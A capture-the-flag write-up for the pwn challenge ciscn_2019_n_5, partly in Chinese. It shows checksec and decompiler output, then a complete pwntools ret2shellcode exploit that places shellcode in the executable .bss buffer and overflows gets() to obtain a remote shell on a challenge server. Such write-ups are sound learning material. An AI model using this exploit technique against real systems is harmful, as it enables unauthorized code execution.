
ciscn_2019_n_5

ubuntu18


0x01


checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_n_5/ciscn_2019_n_5'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments // NX disabled: .bss (where the global `name` buffer lives) is readable, writable AND executable, and with No PIE its address is fixed — that combination is what makes ret2shellcode possible here

IDA

// main() of ciscn_2019_n_5 as decompiled by IDA. Two user-controlled inputs:
// a bounded read() into the global buffer `name`, then an unbounded gets()
// into a 30-byte stack buffer -- the stack overflow used by the exploit.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char text[30]; // [rsp+0h] [rbp-20h] BYREF -- starts 0x20 bytes below the saved rbp

setvbuf(stdout, 0LL, 2, 0LL);
puts("tell me your name");
read(0, name, 0x64uLL); // up to 0x64 raw bytes into the global `name` (.bss, executable); the exploit places its shellcode here
puts("wow~ nice name!");
puts("What do you want to say to me?");
gets(text); // no length limit: classic stack overflow, overwrites the saved rbp and then main's return address
return 0;
}

0x02


思路 ret2shellcode

1.read()写入shellcode

2. 在 gets() 处栈溢出：用 0x28 字节填满 text 和保存的 rbp，再把返回地址覆盖为 bss 段中 name 的地址（0x601080，程序无 PIE 所以地址固定），main 返回时即跳到 shellcode 执行（NX disabled，bss 可执行）

栈布局（text 位于 rbp-0x20）：
text      0x20 字节填充（覆盖 text 直到保存的 rbp 之前）
saved rbp 0x8 字节填充
ret       name 的地址 0x601080（shellcode 所在位置）

0x03


from pwn import *

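# ciscn_2019_n_5 -- ret2shellcode.
# The binary has NX disabled and no PIE (see checksec), so shellcode written
# into the global `name` buffer in .bss is executable at a fixed address; the
# gets() overflow then overwrites main's return address with that address.
context(os='linux', arch='amd64', log_level='debug')
# io = process(['./ciscn_2019_n_5'])
io = remote('node4.buuoj.cn', 27339)

# Stage 1: read(0, name, 0x64) stores up to 0x64 raw bytes (no newline
# truncation), so the shellcode is delivered through this call.
shellcode = asm(shellcraft.sh())
# sendline() appends '\n'; everything must fit in the 0x64-byte read, otherwise
# the tail of the shellcode is silently dropped and the jump lands in garbage.
assert len(shellcode) + 1 <= 0x64, "shellcode too long for read(0, name, 0x64)"
# Wait for the actual prompt rather than consuming a single arbitrary line.
io.sendlineafter(b'tell me your name', shellcode)

# Stage 2: gets(text) has no bound. text sits at rbp-0x20, so 0x20 bytes of
# filler reach the saved rbp and 8 more reach the return address.
padding = 0x20 + 0x8
name_addr = 0x601080  # &name in .bss; fixed because the binary is not PIE
payload = b'a' * padding + p64(name_addr)
# gets() stops at '\n', so the payload itself must not contain 0x0a.
assert b'\n' not in payload, "payload contains a newline; gets() would truncate it"
io.sendlineafter(b'?\n', payload)

io.interactive()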

